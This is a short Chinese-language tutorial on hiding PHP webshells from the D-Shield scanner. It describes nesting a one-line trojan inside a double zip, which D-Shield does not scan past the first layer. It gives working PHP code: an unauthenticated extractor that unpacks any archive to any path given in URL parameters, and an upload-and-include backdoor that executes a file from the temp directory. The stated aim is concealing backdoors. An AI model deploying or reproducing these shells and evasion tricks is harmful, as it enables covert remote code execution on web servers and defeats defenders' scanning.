利用压缩文件来隐藏WEBSHELL
分享几个用来隐藏WEBSHELL的小技巧。
把一句话木马压缩成a.zip文件
使用D盾扫一下
重新对a.zip再进行压缩,压缩成11.zip
这下就识别不了。D盾只对第一层压缩包进行扫描,并不会对压缩包里的压缩包进行扫描,通过这个小技巧我们可以用来隐藏后门。
而已D盾还不会对PHP压缩包类进行报毒等操作。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <?php
if(isset($_GET['zip'])){
if(isset($_GET['f'])){
$zipname=$_GET['zip'];
$f=$_GET['f'];
$zip = new ZipArchive;
$res = $zip->open("$zipname");
if ($res === TRUE) {
$zip->extractTo("$f");
echo '解压成功';
} else {
echo 'failed, code:' . $res;
}
$zip->close();
}
}
?>
|
只需解压两次即可把shell解压出来。
利用缓存目录来隐藏shell
文件上传到缓存目录,在把文件移动到web目录前,利用文件包含来执行代码。
1
2
3
4
5
6
| <?php
@$file = $_FILES['file']['tmp_name'];
if($file != NULL)
@include($file);
echo ("<form method='post' enctype='multipart/form-data'><input name='file' type='file'/><input type='submit' value='上传' /></form>");
?>
|